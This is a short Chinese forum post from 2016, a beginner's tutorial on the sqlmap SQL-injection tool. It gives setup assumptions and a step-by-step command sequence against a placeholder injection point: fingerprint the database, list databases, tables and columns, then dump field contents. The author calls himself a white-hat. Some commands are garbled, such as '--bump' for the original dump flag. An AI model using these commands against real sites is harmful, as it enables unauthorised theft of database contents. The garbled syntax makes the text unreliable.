菜鸟如何使用SQLMAP

pasckr · 发表于 2016-5-9 14:17:51

　　SQLMAP是一个自动注入化工具运行在Python 2.7 环境有具有很强跨平台性、无图形界面
1.
　　使用快捷方式启动

2.
　　现做如下假设
　　1. 已经安装Python2.7 并已经添加了环境变量
　　2. 已经下载了SQLMAP
　　3. 会使用cmd命令行
　　打开要在sqlmap的目录里

注入点、绝对不要做坏事我们是白帽黑阔这已经提交补天了
1
**************************************
1
sqlmap.py-u"注入点"//会判断数据库类型，服务操作系统、脚本类型前后有双引号

1
03服务器/asp.net/ms sql2008
1
sqlmap.py-u"注入点"--dbs//列数据库按上键

1
sqlmap.py-u"注入点"-D数据库名--tables//列出表名

1
sqlmap.py-u"注入点"-D数据库名-T表名--columns//猜字段

1
sqlmap.py-u"注入点"-D数据库名-T表名-C"字段名2,字段名2”--bump//获得字符、段内容